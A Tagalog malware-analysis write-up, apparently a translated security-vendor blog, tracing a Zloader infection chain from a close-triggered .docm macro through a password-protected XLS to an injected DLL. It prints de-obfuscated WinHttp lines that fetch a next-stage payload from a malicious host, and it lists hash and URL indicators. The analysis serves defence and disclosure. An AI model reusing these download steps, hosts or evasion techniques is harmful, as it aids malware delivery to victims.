Ang Zloader aka Terdot – isang variant ng nakakatakot na Zeus banking malware ay kilala sa agresibong paggamit ng mga dokumentong “.xls”, “.xlsx” bilang paunang vector nito upang maihatid ang payload nito. Sa kabila nito, kamakailan ay nakatagpo kami ng ".docm" na file na ginagamit ng pamilyang Zloader upang maisagawa ang paunang aktibidad nito. Ito ay nagpapakita ng mga kalaban na gustong mag-eksperimento sa mga dokumento ng opisina upang maiwasang matukoy ng mga solusyon sa seguridad.

Paunang Vector:
Dito nagsisimula ang kadena ng impeksyon sa file na “.docm” . Ang Docm ay nangangahulugang “Macro-enabled office word document”. Makikita natin sa ibaba ang view ng dokumento na humihiling sa user na paganahin ang nilalaman.

Tulad ng maraming iba pang mga dokumento, sinubukan naming obserbahan ang aktibidad nito pagkatapos paganahin ang nilalaman ngunit walang aktibidad dito. Sa pamamagitan ng pagtingin sa VBA code nito, nakuha namin ang aming sagot. Ang pagpapagana ng nilalaman ay hindi gagawa ng pagpapatupad ng macro. Dito magsisimula ang macro execution sa “Document close” gaya ng ipinapakita.

Sa sandaling isara ng biktima ang dokumentong ito, tatawagin ang function na "nnn" na siyang pangunahing function ng VBA macro na ito. Dito, muling tatawagin ang mga subfunction. Dito rin ginagamit ng mga kalaban ang "Userform" upang maisagawa ang susunod na hakbang.

UserForm_Initialize() function ay ginagamit upang i-invoke ang “Userform2”. Ipinapakita ng larawan sa ibaba ang userform2 object. Sa dialog box nito, ang data ng url ay na-chunk at nag-o-overlap sa ika-25 na ComboBox upang itago ang aktwal na data tulad ng ipinapakita sa ibaba.

Matapos suriin ang lahat ng ComboBox ng userform2, nahanap namin ang nakakahamak na url na ginagamit upang i-download ang 2nd stage payload.

Upang buod sa aktibidad sa itaas, ginagamit ng mga kalaban ang for loop para ma-access ang lahat ng value na ito at gumawa ng final url gaya ng ipinapakita sa ibaba,

Ginagamit ang site na "hxxps[:]//feelingfit-always[.]com/1[.]php" na nakakahamak na may markang 11 sa kabuuang virus, upang i-download ang XLS file na pinoprotektahan ng password. Nakatago muli ang password nito sa VBA macro sa "Userform1". Sa pamamagitan ng paggalugad sa data ng userform1, nakuha namin ang nakatagong password.


Ika-2 Yugto ng Payload:
Ang pagprotekta sa dokumento gamit ang password ay klasikong pamamaraan upang ipagtanggol laban sa mga AV vendor. Ang tamang password ay kinakailangan upang maghukay pa sa pagsusuri. Matapos itugma ang password sa itaas, sa wakas ay makikita na natin ang nilalaman ng excel workbook. Ang XLM macro ay ginagamit sa "Sheet3" upang magsagawa ng karagdagang aktibidad.

Narito ang code ay naka-embed sa iba't ibang mga cell ng dokumento. Ipinapakita ng figure sa ibaba ang na-extract na macro code mula sa workbook sa itaas:

Dito ginagamit ng mga kalaban ang mga excel na inbuilt na function tulad ng IIF at Switch para i-obfuscate ang data. Ang huling de-obfuscated na code ay makikita sa ibaba,
WinHttp.WinHttpRequest.5.1.open GET https[:]//santarosafuneralhome[.]com/2.php False
WinHttp.WinHttpRequest.5.1.SetRequestHeader
WinHttp.WinHttpRequest.5.1.send
Sa itaas ng nakakahamak na url na mayroong kabuuang marka ng virus na 8 ay ginagamit upang i-download ang 3rd stage payload ng pag-atake na ito.
Panghuling Payload Analysis:
Ang DLL ay ang huling payload ng Zloader. Narito ang DLL ay lubos na na-obfuscated at iniiwasan ang mga direktang tawag sa mga Windows API. Ang pag-hash ay ginagamit upang kalkulahin ang mga address at ginagawa ang tawag gamit ang mga kinakalkula na halaga, na ginagawang mahirap ang pag-reverse.


Ang DLL ay lumilikha ng prosesong 'msiexec.exe', na isang tunay na proseso ng Microsoft na pagmamay-ari ng Windows Component installer, sa suspendido na mode at nag-inject ng naka-encrypt na file dito.


Nag-inject din ito ng routine na magde-decrypt at maglalabas ng malisyosong PE para ipatupad.

Sa pagtatakda ng konteksto ng thread, ang paunang execution point ay naipasa at sa wakas ang injected code ay naisakatuparan sa resume thread.
Kapag ang thread na ito ng msiexec.exe ay naipatupad, sinusubukan nitong kumonekta sa mga CnC server nito gaya ng ipinapakita,

Dahil naka-down ang mga url na ito sa oras ng pagsusuri, hindi na namin nagawang mas malalim pa ito.
Paghihinuha:
Ipinapakita ng ganitong uri ng pag-atake kung paano binabago ng mga kalaban ang kanilang mekanismo upang simulan ang chain ng impeksyon upang ikompromiso ang biktima. Dapat palaging maging maingat ang user habang binubuksan ang anumang mga file ng opisina. Mabilis na gumaling at Seqrite mga solusyon sa seguridad ng negosyo protektahan ang mga customer nito mula sa naturang mga file. Kaya, tandaan na panatilihing laging na-update ang mga solusyon sa seguridad ng endpoint.
Mga IOC:
DOCM:
117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d
409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1
91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4
XLS: 52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89
URL:
https[://]tiodeitidampheater.tk/post.php
https[://]actes-etatcivil.com/post.php
https[://]ankarakreatif.com/post.php
https[://]www.ramazanyildiz.net/post.php
https[://]hispaniaeng.com/post.php
https[://]www.ifdd.francophonie.org/post.php
Eksperto sa Paksang Aralin
Anjali Raut
Priyanka Shinde



